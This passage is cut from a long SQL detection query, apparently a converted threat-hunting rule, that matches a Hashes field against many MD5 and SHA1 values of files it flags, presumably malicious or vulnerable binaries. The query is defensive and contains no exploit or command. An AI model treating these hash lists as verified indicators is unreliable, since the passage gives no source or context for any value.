'%MD5=0761c357aed5f591142edaefdf0c89c8%' ESCAPE '\\' OR Hashes LIKE '%MD5=23cf3da010497eb2bf39a5c5a57e437c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c49a1956a6a25ffc25ad97d6762b0989%' ESCAPE '\\' OR Hashes LIKE '%MD5=f406c5536bcf9bacbeb7ce8a3c383bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=f2f728d2f69765f5dfda913d407783d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b817d0e7714b9d43db43ae4a22a161e%' ESCAPE '\\' OR Hashes LIKE '%MD5=715f8efab1d1c660e4188055c4b28eed%' ESCAPE '\\' OR Hashes LIKE '%MD5=a01c412699b6f21645b2885c2bae4454%' ESCAPE '\\' OR Hashes LIKE '%MD5=010c0e5ac584e3ab97a2daf84cf436f5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5db81974ffda566fa821400419f59be%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014ba35d406475311a2eab0c4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d487f77be4471900d6ccbc47242cc25%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f2888e57fdd6aee466962c25ba7d62d%' ESCAPE '\\' OR Hashes LIKE '%MD5=507a649eb585d8d0447eab0532ef0c73%' ESCAPE '\\' OR Hashes LIKE '%MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11%' ESCAPE '\\' OR Hashes LIKE '%MD5=cd9f0fcecf1664facb3671c0130dc8bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=b10b210c5944965d0dc85e70a0b19a42%' ESCAPE '\\' OR Hashes LIKE '%MD5=ae5eb2759305402821aeddc52ba9a6d6%' ESCAPE '\\' OR Hashes LIKE '%MD5=f5051c756035ef5de9c4c48bacb0612b%' ESCAPE '\\' OR Hashes LIKE '%MD5=1898ceda3247213c084f43637ef163b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=37086ae5244442ba552803984a11d6cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=825703c494e0d270f797f1ecf070f698%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\' OR Hashes LIKE '%MD5=75d6c3469347de1cdfa3b1b9f1544208%' ESCAPE '\\' OR Hashes LIKE '%MD5=9ab9f3b75a2eb87fafb1b7361be9dfb3%' ESCAPE '\\' OR Hashes LIKE '%MD5=5f9785e7535f8f602cb294a54962c9e7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7d46d0ddaf8c7e1776a70c220bf47524%' ESCAPE '\\' OR Hashes LIKE '%MD5=f9844524fb0009e5b784c21c7bad4220%' ESCAPE '\\' OR Hashes LIKE '%MD5=828bb9cb1dd449cd65a29b18ec46055f%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=4d17b32be70ef39eae5d5edeb5e89877%' ESCAPE '\\' OR Hashes LIKE '%MD5=2391fb461b061d0e5fccb050d4af7941%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d4159694e1754f262e326b52a3b305a%' ESCAPE '\\' OR Hashes LIKE '%MD5=a60c9173563b940203cf4ad38ccf2082%' ESCAPE '\\' OR Hashes LIKE '%MD5=63e333d64a8716e1ae59f914cb686ae8%' ESCAPE '\\' OR Hashes LIKE '%MD5=a9f220b1507a3c9a327a99995ff99c82%' ESCAPE '\\' OR Hashes LIKE '%MD5=c5f5d109f11aadebae94c77b27cb026f%' ESCAPE '\\' OR Hashes LIKE '%MD5=5bab40019419a2713298a5c9173e5d30%' ESCAPE '\\' OR Hashes LIKE '%MD5=c996d7971c49252c582171d9380360f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=98763a3dee3cf03de334f00f95fc071a%' ESCAPE '\\' OR Hashes LIKE '%MD5=e79c91c27df3eaf82fb7bd1280172517%' ESCAPE '\\' OR Hashes LIKE '%MD5=a42249a046182aaaf3a7a7db98bfa69d%' ESCAPE '\\' OR Hashes LIKE '%MD5=803a371a78d528a44ef8777f67443b16%' ESCAPE '\\' OR Hashes LIKE '%MD5=9007c94c9d91ccff8d7f5d4cdddcc403%' ESCAPE '\\' OR Hashes LIKE '%MD5=11fb599312cb1cf43ca5e879ed6fb71e%' ESCAPE '\\' OR Hashes LIKE '%MD5=7f9309f5e4defec132b622fadbcad511%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=8636fe3724f2bcba9399daffd6ef3c7e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9dfd73dadb2f1c7e9c9d2542981aaa63%' ESCAPE '\\' OR Hashes LIKE '%MD5=490b1f404c4f31f4538b36736c990136%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1d063c9422a19944cdaa6714623f2ec%' ESCAPE '\\' OR Hashes LIKE '%MD5=dacb62578b3ea191ea37486d15f4f83c%' ESCAPE '\\' OR Hashes LIKE '%MD5=2da209dde8188076a9579bd256dc90d0%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ba6afe0ea182236f98365bd977adfdf%' ESCAPE '\\' OR Hashes LIKE '%MD5=4c016fd76ed5c05e84ca8cab77993961%' ESCAPE '\\' OR Hashes LIKE '%MD5=ad22a7b010de6f9c6f39c350a471a440%' ESCAPE '\\' OR Hashes LIKE '%MD5=79483cb29a0c428e1362ec8642109eee%' ESCAPE '\\' OR Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%MD5=ccf523b951afaa0147f22e2a7aae4976%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=736c4b85ce346ddf3b49b1e3abb4e72a%' ESCAPE '\\' OR Hashes LIKE '%MD5=b0baac4d6cbac384a633c71858b35a2e%' ESCAPE '\\' OR Hashes LIKE '%MD5=798de15f187c1f013095bbbeb6fb6197%' ESCAPE '\\' OR Hashes LIKE '%MD5=a86150f2e29b35369afa2cafd7aa9764%' ESCAPE '\\' OR Hashes LIKE '%MD5=b941c8364308990ee4cc6eadf7214e0f%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd04cd3de0c19bede84e9c95a86b3ca8%' ESCAPE '\\' OR Hashes LIKE '%MD5=6909b5e86e00b4033fedfca1775b0e33%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b91a44a488e4d539f2e55476b216024%' ESCAPE '\\' OR Hashes LIKE '%MD5=8b287636041792f640f92e77e560725e%' ESCAPE '\\' OR Hashes LIKE '%MD5=07f83829e7429e60298440cd1e601a6a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0395b4e0eb21693590ad1cfdf7044b8b%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b058945c9f2b8d8ebc485add1101ba5%' ESCAPE '\\' OR Hashes LIKE '%MD5=0067c788e1cb174f008c325ebde56c22%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2c1b8c00b99e913d992a870ed478a24%' ESCAPE '\\' OR Hashes LIKE '%MD5=84ba7af6ada1b3ea5efb9871a0613fc6%' ESCAPE '\\' OR Hashes LIKE '%MD5=dbc415304403be25ac83047c170b0ec2%' ESCAPE '\\' OR Hashes LIKE '%MD5=31469f1313871690e8dc2e8ee4799b22%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d465b4487dc81effaa84f122b71c24f%' ESCAPE '\\' OR Hashes LIKE '%MD5=64efbffaa153b0d53dc1bccda4279299%' ESCAPE '\\' OR Hashes LIKE '%MD5=b164daf106566f444dfb280d743bc2f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7c72a7e1d42b0790773efd8700e24952%' ESCAPE '\\' OR Hashes LIKE '%MD5=56a515173b211832e20fbc64e5a0447c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c2eb4539a4f6ab6edd01bdc191619975%' ESCAPE '\\' OR Hashes LIKE '%MD5=d1bac75205c389d6d5d6418f0457c29b%' ESCAPE '\\' OR Hashes LIKE '%MD5=68dde686d6999ad2e5d182b20403240b%' ESCAPE '\\' OR Hashes LIKE '%MD5=a785b3bc4309d2eb111911c1b55e793f%' ESCAPE '\\' OR Hashes LIKE '%MD5=6ab7b8ef0c44e7d2d5909fdb58d37fa5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9ce18960c23f38706ae9c6584d9ac90%' ESCAPE '\\' OR Hashes LIKE '%MD5=ab53d07f18a9697139ddc825b466f696%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=ba5f0f6347780c2ed911bbf888e75bef%' ESCAPE '\\' OR Hashes LIKE '%MD5=13ee349c15ee5d6cf640b3d0111ffc0e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9a237fa07ce3ed06ea924a9bed4a6b99%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa222bed731713904320723b9c085b11%' ESCAPE '\\' OR Hashes LIKE '%MD5=0898af0888d8f7a9544ef56e5e16354e%' ESCAPE '\\' OR Hashes LIKE '%MD5=e076dadf37dd43a6b36aeed957abee9e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f27c09cc8680e06b04d6a9c34ca1e08%' ESCAPE '\\' OR Hashes LIKE '%MD5=1b32c54b95121ab1683c7b83b2db4b96%' ESCAPE '\\' OR Hashes LIKE '%MD5=715572dfe6fb10b16f980bfa242f3fa5%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a06bcd96ef0b90a1753a805b4235f28%' ESCAPE '\\' OR Hashes LIKE '%MD5=f242cffd9926c0ccf94af3bf16b6e527%' ESCAPE '\\' OR Hashes LIKE '%MD5=7ed6030f14e66e743241f2c1fa783e69%' ESCAPE '\\' OR Hashes LIKE '%MD5=0d6fef14f8e1ce5753424bd22c46b1ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=a4fda97f452b8f8705695a729f5969f7%' ESCAPE '\\' OR Hashes LIKE '%MD5=62c18d61ed324088f963510bae43b831%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5a642329cce4df94b8dc1ba9660ae34%' ESCAPE '\\' OR Hashes LIKE '%MD5=a641e3dccba765a10718c9cb0da7879e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed07f1a8038596574184e09211dfc30f%' ESCAPE '\\' OR Hashes LIKE '%MD5=3473faea65fba5d4fbe54c0898a3c044%' ESCAPE '\\' OR Hashes LIKE '%MD5=708ac9f7b12b6ca4553fd8d0c7299296%' ESCAPE '\\' OR Hashes LIKE '%MD5=bbe4f5f8b0c0f32f384a83ae31f49a00%' ESCAPE '\\' OR Hashes LIKE '%MD5=257483d5d8b268d0d679956c7acdf02d%' ESCAPE '\\' OR Hashes LIKE '%MD5=312e31851e0fc2072dbf9a128557d6ef%' ESCAPE '\\' OR Hashes LIKE '%MD5=14eead4d42728e9340ec8399a225c124%' ESCAPE '\\' OR Hashes LIKE '%MD5=de1cc5c266140bff9d964fab87a29421%' ESCAPE '\\' OR Hashes LIKE '%MD5=9a9dbf5107848c254381be67a4c1b1dd%' ESCAPE '\\' OR Hashes LIKE '%MD5=1dc94a6a82697c62a04e461d7a94d0b0%' ESCAPE '\\' OR Hashes LIKE '%MD5=2850608430dd089f24386f3336c84729%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d131a7462e568213b44ef69156f10a5%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=b8b6686324f7aa77f570bc019ec214e6%' ESCAPE '\\' OR Hashes LIKE '%MD5=22823fed979903f8dfe3b5d28537eb47%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1d3a6bb423739a5e781f7eee04c9cfd%' ESCAPE '\\' OR Hashes LIKE '%MD5=0c0195c48b6b8582fa6f6373032118da%' ESCAPE '\\' OR Hashes LIKE '%MD5=5228b7a738dc90a06ae4f4a7412cb1e9%' ESCAPE '\\' OR Hashes LIKE '%MD5=62f02339fe267dc7438f603bfb5431a1%' ESCAPE '\\' OR Hashes LIKE '%MD5=22949977ce5cd96ba674b403a9c81285%' ESCAPE '\\' OR Hashes LIKE '%MD5=5ca1922ed5ee2b533b5f3dd9be20fd9a%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed08a6264c5c92099d6d1dae5e8f530%' ESCAPE '\\' OR Hashes LIKE '%MD5=b0770094c3c64250167b55e4db850c04%' ESCAPE '\\' OR Hashes LIKE '%MD5=a6e9d6505f6d2326a8a9214667c61c67%' ESCAPE '\\' OR Hashes LIKE '%MD5=8407ddfab85ae664e507c30314090385%' ESCAPE '\\' OR Hashes LIKE '%MD5=9321a61a25c7961d9f36852ecaa86f55%' ESCAPE '\\' OR Hashes LIKE '%MD5=a711e6ab17802fabf2e69e0cd57c54cd%' ESCAPE '\\' OR Hashes LIKE '%MD5=29ccff428e5eb70ae429c3da8968e1ec%' ESCAPE '\\' OR Hashes LIKE '%MD5=79df0eabbf2895e4e2dae15a4772868c%' ESCAPE '\\' OR Hashes LIKE '%MD5=fb7c61ef427f9b2fdff3574ee6b1819b%' ESCAPE '\\' OR Hashes LIKE '%MD5=f778489c7105a63e9e789a02412aaa5f%' ESCAPE '\\' OR Hashes LIKE '%MD5=fef9dd9ea587f8886ade43c1befbdafe%' ESCAPE '\\' OR Hashes LIKE '%MD5=43830326cd5fae66f5508e27cbec39a0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c7a57cd4bea07dadba2e2fb914379910%' ESCAPE '\\' OR Hashes LIKE '%MD5=f1e054333cc40f79cfa78e5fbf3b54c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc564bac7258e16627b9de0ce39fae25%' ESCAPE '\\' OR Hashes LIKE '%MD5=054299e09cea38df2b84e6b29348b418%' ESCAPE '\\' OR Hashes LIKE '%MD5=97221e16e7a99a00592ca278c49ffbfc%' ESCAPE '\\' OR Hashes LIKE '%MD5=8d63e1a9ff4cafee1af179c0c544365c%' ESCAPE '\\' OR Hashes LIKE '%MD5=96421b56dbda73e9b965f027a3bda7ba%' ESCAPE '\\' OR Hashes LIKE '%MD5=4ae55080ec8aed49343e40d08370195c%' ESCAPE '\\' OR Hashes LIKE '%MD5=988dabdcf990b134b0ac1e00512c30c4%' ESCAPE '\\' OR Hashes LIKE 
'%MD5=bbbc9a6cc488cfb0f6c6934b193891eb%' ESCAPE '\\' OR Hashes LIKE '%MD5=76c643ab29d497317085e5db8c799960%' ESCAPE '\\' OR Hashes LIKE '%MD5=e9a30edef1105b8a64218f892b2e56ed%' ESCAPE '\\' OR Hashes LIKE '%MD5=7bd840ff7f15df79a9a71fec7db1243e%' ESCAPE '\\' OR Hashes LIKE '%MD5=1cff7b947f8c3dea1d34dc791fc78cdc%' ESCAPE '\\' OR Hashes LIKE '%MD5=2c54859a67306e20bfdc8887b537de72%' ESCAPE '\\' OR Hashes LIKE '%MD5=a5f637d61719d37a5b4868c385e363c0%' ESCAPE '\\' OR Hashes LIKE '%MD5=2509a71a02296aa65a3428ddfac22180%' ESCAPE '\\' OR Hashes LIKE '%MD5=6cce5bb9c8c2a8293df2d3b1897941a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=7a16fca3d56c6038c692ec75b2bfee15%' ESCAPE '\\' OR Hashes LIKE '%MD5=eaea9ccb40c82af8f3867cd0f4dd5e9d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d2588631d8aae2a3e54410eaf54f0679%' ESCAPE '\\' OR Hashes LIKE '%MD5=b47dee29b5e6e1939567a926c7a3e6a4%' ESCAPE '\\' OR Hashes LIKE '%MD5=fac8eb49e2fd541b81fcbdeb98a199cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=1a234f4643f5658bab07bfa611282267%' ESCAPE '\\' OR Hashes LIKE '%MD5=0752f113d983030939b4ab98b0812cf0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f0c463d29a5914b01e4607889094f1b7d95e7aaf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ecb4d096a9c58643b02f328d2c7742a38e017cf0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=684786de4b3b3f53816eae9df5f943a22c89601f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=745335bcdf02fb42df7d890a24858e16094f48fd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=25d812a5ece19ea375178ef9d60415841087726e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d417c0be261b0c6f44afdec3d5432100e420c3ed%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6afc6b04cf73dd461e4a4956365f25c1f1162387%' ESCAPE '\\' OR Hashes LIKE '%SHA1=01a578a3a39697c4de8e3dab04dba55a4c35163e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7e836dadc2e149a0b758c7e22c989cbfcce18684%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a705af959af61bad48ef7579f839cb5ebd654d2%' ESCAPE '\\' OR 
Hashes LIKE '%SHA1=bc2f3850c7b858340d7ed27b90e63b036881fd6c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e22495d92ac3dcae5eeb1980549a9ead8155f98a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c969f1f73922fd95db1992a5b552fbc488366a40%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4c18754dca481f107f0923fb8ef5e149d128525d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2fc6845047abcf2a918fce89ab99e4955d08e72c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f7a8e26a97980544be634b26899afbefb0a833c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21edff2937eb5cd6f6b0acb7ee5247681f624260%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6c1bb3a72ebfb5359b9e22ca44d0a1ff825a68f2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=064de88dbbea67c149e779aac05228e5405985c7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ea877092d57373cb466b44e7dbcad4ce9a547344%' ESCAPE '\\' OR Hashes LIKE '%SHA1=55ab7e27412eca433d76513edc7e6e03bcdd7eda%' ESCAPE '\\' OR Hashes LIKE '%SHA1=976777d39d73034df6b113dfce1aa6e1d00ffcfd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f7501e01d84a2297c85cb39880ec4e40ac3fe8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a6816949cd469b6e5c35858d19273936fab1bef6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=91f832f46e4c38ecc9335460d46f6f71352cffed%' ESCAPE '\\' OR Hashes LIKE '%SHA1=43419df1f9a07430a18c5f3b3cc74de621be0f8e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=01779ee53f999464465ed690d823d160f73f10e7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcd615df88645d1f57ff5702bd6758b77efea6d0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10115219e3595b93204c70eec6db3e68a93f3144%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33285b2e97a0aeb317166cce91f6733cf9c1ad53%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2c27abbbbcf10dfb75ad79557e30ace5ed314df8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10e15ba8ff8ed926ddd3636cec66a0f08c9860a4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=291b4a88ffd2ac1d6bf812ecaedc2d934dc503cb%' ESCAPE '\\' 
OR Hashes LIKE '%SHA1=05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8f5cd4a56e6e15935491aa40adb1ecad61eafe7c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7948a4e9a3a1a9ed0e4e41350e422464d8313cd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=19bd488fe54b011f387e8c5d202a70019a204adf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=eeff4ec4ebc12c6acd2c930dc2eaaf877cfec7ec%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15d1a6a904c8409fb47a82aefa42f8c3c7d8c370%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d02403f85be6f243054395a873b41ef8a17ea279%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4243dbbf6e5719d723f24d0f862afd0fcb40bc35%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4789b910023a667bee70ff1f1a8f369cffb10fe8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=50e2bc41f0186fdce970b80e2a2cb296353af586%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=78b9481607ca6f3a80b4515c432ddfe6550b18a8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e039c9dd21494dbd073b4823fc3a17fbb951ec6c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=806832983bb8cb1e26001e60ea3b7c3ade4d3471%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c1d5cf8c43e7679b782630e93f5e6420ca1749a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a3ed5cbfbc17b58243289f3cf575bf04be49591d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7fb52290883a6b69a96d480f2867643396727e83%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=da9cea92f996f938f699902482ac5313d5e8b28e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc7b022f8bd149efbcb2204a48dce75c72633526%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4b009e91bae8d27b160dc195f10c095f8a2441e1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=51b60eaa228458dee605430aae1bc26f3fc62325%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6bd965300f07012d1b651a9b8776028c45b149a%' ESCAPE 
'\\' OR Hashes LIKE '%SHA1=729a8675665c61824f22f06c7b954be4d14b52c4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=37364cb5f5cefd68e5eca56f95c0ab4aff43afcc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e4436c8c42ba5ffabd58a3b2256f6e86ccc907ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7ba19a701c8af76988006d616a5f77484c13cb0a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=25bf4e30a94df9b8f8ab900d1a43fd056d285c9d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d8498707f295082f6a95fd9d32c9782951f5a082%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5e6ddd2b39a3de0016385cbd7aa50e49451e376d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=943593e880b4d340f2548548e6e673ef6f61eed3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2dfcb799b3c42ecb0472e27c19b24ac7532775ce%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6714380bc0b8ab09b9a0d2fa66d1b025b646b946%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a7d66874a0472a47087fabaa033a85d47413379%' ESCAPE '\\' OR Hashes LIKE '%SHA1=012db3a80faf1f7f727b538cbe5d94064e7159de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6d349823bbb1f5b44bae91357895dba653c5861%' ESCAPE '\\' OR Hashes LIKE '%SHA1=643383938d5e0d4fd30d302af3e9293a4798e392%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3599ea2ac1fa78f423423a4cf90106ea0938dde8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f42f28d164205d9f6dab9317c9fecad54c38d5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d9c09dd725bc7bc3c19b4db37866015817a516ef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0c74d09da7baf7c05360346e4c3512d0cd433d59%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c256edd10823ca76c0443a330e523027b70522d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=65d8a7c2e867b22d1c14592b020c548dd0665646%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7859e75580570e23a1ef7208b9a76f81738043d5%' 
ESCAPE '\\' OR Hashes LIKE '%SHA1=b242b0332b9c9e8e17ec27ef10d75503d20d97b6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac600a2bc06b312d92e649b7b55e3e91e9d63451%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe10018af723986db50701c8532df5ed98b17c39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b9807b8840327c6d7fbdde45fc27de921f1f1a82%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a3636986cdcd1d1cb8ab540f3d5c29dcc90bb8f0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=054a50293c7b4eea064c91ef59cf120d8100f237%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=485c0b9710a196c7177b99ee95e5ddb35b26ddd1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=faa870b0cb15c9ac2b9bba5d0470bd501ccd4326%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0291d0457acaf0fe8ed5c3137302390469ce8b35%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8183a341ba6c3ce1948bf9be49ab5320e0ee324d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5a7dd0da0aee0bdedc14c1b7831b9ce9178a0346%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b25170e09c9fb7c0599bfba3cf617187f6a733ac%' ESCAPE '\\' OR Hashes LIKE '%SHA1=19f3343bfad0ef3595f41d60272d21746c92ffca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a48aa80942fc8e0699f518de4fd6512e341d4196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f6f11ad2cd2b0cf95ed42324876bee1d83e01775%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9a35ae9a1f95ce4be64adc604c80079173e4a676%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ea360a9f23bb7cf67f08b88e6a185a699f0c5410%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403%' ESCAPE '\\' OR Hashes LIKE '%SHA1=08596732304351b311970ff96b21f451f23b1e25%' ESCAPE '\\' OR Hashes LIKE '%SHA1=29a190727140f40cea9514a6420f5a195e36386b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d014b5edd6e19ce0e8395a64faedf49688ecb5%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=31fac347aa26e92db4d8c9e1ba37a7c7a2234f08%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f052dc35b74a1a6246842fbb35eb481577537826%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89909fa481ff67d7449ee90d24c167b17b0612f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7d827a41b2c4b7638495cd1d77926f1ba902978%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c23eeb6f18f626ce1fd840227f351fa7543bb167%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3805e4e08ad342d224973ecdade8b00c40ed31be%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8302802b709ad242a81b939b6c90b3230e1a1f1e%' ESCAPE '\\' OR Hashes LIKE 